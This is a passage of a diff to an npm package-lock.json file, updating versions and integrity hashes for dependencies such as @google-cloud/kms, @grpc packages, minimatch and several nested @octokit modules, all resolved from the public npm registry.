"https://registry.npmjs.org/@aws/lambda-invoke-store/-/lambda-invoke-store-0.2.3.tgz", @@ -5105,6 +5178,22 @@ "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", "dev": true }, + "node_modules/@eslint/eslintrc/node_modules/minimatch": { + "version": "9.0.9", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz", + "integrity": "sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.2" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, "node_modules/@eslint/eslintrc/node_modules/ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", @@ -5439,23 +5528,24 @@ } }, "node_modules/@google-cloud/kms": { - "version": "4.5.0", - "resolved": "https://registry.npmjs.org/@google-cloud/kms/-/kms-4.5.0.tgz", - "integrity": "sha512-i2vC0DI7bdfEhQszqASTw0KVvbB7HsO2CwTBod423NawAu7FWi+gVVa7NLfXVNGJaZZayFfci2Hu+om/HmyEjQ==", + "version": "5.4.0", + "resolved": "https://registry.npmjs.org/@google-cloud/kms/-/kms-5.4.0.tgz", + "integrity": "sha512-+06zUCaJM+wyZISM3F6u/jSqoBs0iZ8Aj9rqOJFePoWkNN7FbR4mQpV7okGHA+Y7caVgq+4QtIDKiFd17SZT+A==", "license": "Apache-2.0", "dependencies": { - "google-gax": "^4.0.3" + "google-gax": "^5.0.0" }, "engines": { - "node": ">=14.0.0" + "node": ">=18" } }, "node_modules/@grpc/grpc-js": { - "version": "1.12.2", - "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.12.2.tgz", - "integrity": "sha512-bgxdZmgTrJZX50OjyVwz3+mNEnCTNkh3cIqGPWVNeW9jX6bn1ZkU80uPd+67/ZpIJIjRQ9qaHCjhavyoWYxumg==", + "version": "1.14.3", + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz", + "integrity": "sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA==", + "license": "Apache-2.0", "dependencies": { - "@grpc/proto-loader": "^0.7.13", + "@grpc/proto-loader": "^0.8.0", "@js-sdsl/ordered-map": "^4.4.2" }, "engines": { @@ -5463,13 +5553,14 @@ } }, "node_modules/@grpc/proto-loader": { - "version": "0.7.13", - "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.13.tgz", - "integrity": "sha512-AiXO/bfe9bmxBjxxtYxFAXGZvMaN5s8kO+jBHAJCON8rJoB5YS/D6X7ZNc6XQkuHNmyl4CYaMI1fJ/Gn27RGGw==", + "version": "0.8.0", + "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz", + "integrity": "sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ==", + "license": "Apache-2.0", "dependencies": { "lodash.camelcase": "^4.3.0", "long": "^5.0.0", - "protobufjs": "^7.2.5", + "protobufjs": "^7.5.3", "yargs": "^17.7.2" }, "bin": { @@ -5479,118 +5570,27 @@ "node": ">=6" } }, - "node_modules/@grpc/proto-loader/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } + "node_modules/@hapi/bourne": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@hapi/bourne/-/bourne-2.1.0.tgz", + "integrity": "sha512-i1BpaNDVLJdRBEKeJWkVO6tYX6DMFBuwMhSuWqLsY4ufeTKGVuV5rBsUhxPayXqnnWHgXUAmWK16H/ykO5Wj4Q==" }, - "node_modules/@grpc/proto-loader/node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, + "node_modules/@hexagon/base64": { + "version": "1.1.28", + "resolved": "https://registry.npmjs.org/@hexagon/base64/-/base64-1.1.28.tgz", + "integrity": "sha512-lhqDEAvWixy3bZ+UOYbPwUbBkwBq5C1LAJ/xPC8Oi+lL54oyakv/npbA0aU2hgCsx/1NUd4IBvV03+aUBWxerw==", + "license": "MIT" + }, + "node_modules/@hono/node-server": { + "version": "1.19.14", + "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.14.tgz", + "integrity": "sha512-GwtvgtXxnWsucXvbQXkRgqksiH2Qed37H9xHZocE5sA3N8O8O8/8FA3uclQXxXVzc9XBZuEOMK7+r02FmSpHtw==", + "license": "MIT", "engines": { - "node": ">=12" - } - }, - "node_modules/@grpc/proto-loader/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/@grpc/proto-loader/node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@grpc/proto-loader/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@grpc/proto-loader/node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/@grpc/proto-loader/node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@grpc/proto-loader/node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "engines": { - "node": ">=12" - } - }, - "node_modules/@hapi/bourne": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@hapi/bourne/-/bourne-2.1.0.tgz", - "integrity": "sha512-i1BpaNDVLJdRBEKeJWkVO6tYX6DMFBuwMhSuWqLsY4ufeTKGVuV5rBsUhxPayXqnnWHgXUAmWK16H/ykO5Wj4Q==" - }, - "node_modules/@hexagon/base64": { - "version": "1.1.28", - "resolved": "https://registry.npmjs.org/@hexagon/base64/-/base64-1.1.28.tgz", - "integrity": "sha512-lhqDEAvWixy3bZ+UOYbPwUbBkwBq5C1LAJ/xPC8Oi+lL54oyakv/npbA0aU2hgCsx/1NUd4IBvV03+aUBWxerw==", - "license": "MIT" - }, - "node_modules/@hono/node-server": { - "version": "1.19.12", - "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.12.tgz", - "integrity": "sha512-txsUW4SQ1iilgE0l9/e9VQWmELXifEFvmdA1j6WFh/aFPj99hIntrSsq/if0UWyGVkmrRPKA1wCeP+UCr1B9Uw==", - "license": "MIT", - "engines": { - "node": ">=18.14.1" - }, - "peerDependencies": { - "hono": "^4" + "node": ">=18.14.1" + }, + "peerDependencies": { + "hono": "^4" } }, "node_modules/@humanwhocodes/config-array": { @@ -5624,6 +5624,22 @@ } } }, + "node_modules/@humanwhocodes/config-array/node_modules/minimatch": { + "version": "9.0.9", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz", + "integrity": "sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.2" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, "node_modules/@humanwhocodes/config-array/node_modules/ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", @@ -6338,15 +6354,6 @@ "node": ">=18.0.0" } }, - "node_modules/@isaacs/fs-minipass/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/@isaacs/ttlcache": { "version": "1.4.1", "resolved": "https://registry.npmjs.org/@isaacs/ttlcache/-/ttlcache-1.4.1.tgz", @@ -6411,6 +6418,7 @@ "version": "4.4.2", "resolved": "https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz", "integrity": "sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==", + "license": "MIT", "funding": { "type": "opencollective", "url": "https://opencollective.com/js-sdsl" @@ -7284,6 +7292,18 @@ "url": "https://paulmillr.com/funding/" } }, + "node_modules/@nodable/entities": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz", + "integrity": "sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/nodable" + } + ], + "license": "MIT" + }, "node_modules/@node-saml/node-saml": { "version": "5.1.0", "resolved": "https://registry.npmjs.org/@node-saml/node-saml/-/node-saml-5.1.0.tgz", @@ -7307,6 +7327,15 @@ "node": ">= 18" } }, + "node_modules/@node-saml/node-saml/node_modules/@xmldom/xmldom": { + "version": "0.8.12", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.12.tgz", + "integrity": "sha512-9k/gHF6n/pAi/9tqr3m3aqkuiNosYTurLLUtc7xQ9sxB/wm7WPygCv8GYa6mS0fLJEHhqMC1ATYhz++U/lRHqg==", + "license": "MIT", + "engines": { + "node": ">=10.0.0" + } + }, "node_modules/@node-saml/node-saml/node_modules/debug": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", @@ -7523,32 +7552,19 @@ } }, "node_modules/@octokit/auth-app/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/auth-app/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/auth-app/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/auth-app/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -7633,32 +7649,19 @@ } }, "node_modules/@octokit/auth-oauth-app/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/auth-oauth-app/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/auth-oauth-app/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/auth-oauth-app/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -7734,32 +7737,19 @@ } }, "node_modules/@octokit/auth-oauth-device/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/auth-oauth-device/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/auth-oauth-device/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/auth-oauth-device/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -7836,32 +7826,19 @@ } }, "node_modules/@octokit/auth-oauth-user/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/auth-oauth-user/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/auth-oauth-user/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/auth-oauth-user/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -7921,6 +7898,35 @@ "node": ">= 18" } }, + "node_modules/@octokit/auth-unauthenticated/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/@octokit/auth-unauthenticated/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/@octokit/auth-unauthenticated/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/@octokit/core": { "version": "5.2.1", "resolved": "https://registry.npmjs.org/@octokit/core/-/core-5.2.1.tgz", @@ -7945,6 +7951,20 @@ "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", "license": "MIT" }, + "node_modules/@octokit/core/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, "node_modules/@octokit/core/node_modules/@octokit/types": { "version": "13.10.0", "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", @@ -8067,32 +8087,19 @@ } }, "node_modules/@octokit/oauth-methods/node_modules/@octokit/request-error": { - "version": "6.1.8", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-6.1.8.tgz", - "integrity": "sha512-WEi/R0Jmq+IJKydWlKDmryPcmdYSVjL3ekaiEL1L9eo1sUnqMJ+grqmC9cjk7CA7+b2/T397tO5d8YLOH3qYpQ==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { - "@octokit/types": "^14.0.0" + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/oauth-methods/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { - "version": "25.1.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", - "integrity": "sha512-idsIggNXUKkk0+BExUn1dQ92sfysJrje03Q0bv0e+KPLrvyqZF8MnBpFz8UNfYDwB3Ie7Z0TByjWfzxt7vseaA==", - "license": "MIT" - }, - "node_modules/@octokit/oauth-methods/node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "14.1.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-14.1.0.tgz", - "integrity": "sha512-1y6DgTy8Jomcpu33N+p5w58l6xyt55Ar2I91RPiIA0xCJBXyUAhXCcmZaDWSANiha7R9a6qJJ2CRomGPZ6f46g==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^25.1.0" - } - }, "node_modules/@octokit/oauth-methods/node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "25.1.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-25.1.0.tgz", @@ -8150,7 +8157,36 @@ "node": ">= 18" } }, - "node_modules/@octokit/plugin-paginate-graphql": { + "node_modules/@octokit/plugin-enterprise-compatibility/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/@octokit/plugin-enterprise-compatibility/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/@octokit/plugin-enterprise-compatibility/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, + "node_modules/@octokit/plugin-paginate-graphql": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-graphql/-/plugin-paginate-graphql-4.0.1.tgz", "integrity": "sha512-R8ZQNmrIKKpHWC6V2gum4x9LG2qF1RxRjo27gjQcG3j+vf2tLsEfE7I/wRWEPzYMaenr1M+qDAtNcwZve1ce1A==", @@ -8224,11 +8260,12 @@ "integrity": "sha512-VRaeH8nCDtF5aXWnjPuEMIYf1itK/s3JYyJcWFJT8X9pSNnBtriDf7wlEWsGuhPLl4QIH4xM8fqTXDwJ3Mu6sw==" }, "node_modules/@octokit/plugin-retry/node_modules/@octokit/request-error": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-4.0.2.tgz", - "integrity": "sha512-uqwUEmZw3x4I9DGYq9fODVAAvcLsPQv97NRycP6syEFu5916M189VnNBW2zANNwqg3OiligNcAey7P0SET843w==", + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", "dependencies": { - "@octokit/types": "^10.0.0", + "@octokit/types": "^13.1.0", "deprecation": "^2.0.0", "once": "^1.4.0" }, @@ -8236,6 +8273,21 @@ "node": ">= 18" } }, + "node_modules/@octokit/plugin-retry/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/@octokit/plugin-retry/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/@octokit/plugin-retry/node_modules/@octokit/types": { "version": "10.0.0", "resolved": "https://registry.npmjs.org/@octokit/types/-/types-10.0.0.tgz", @@ -8259,54 +8311,39 @@ "node": ">= 18" } }, - "node_modules/@octokit/request-error": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", - "integrity": 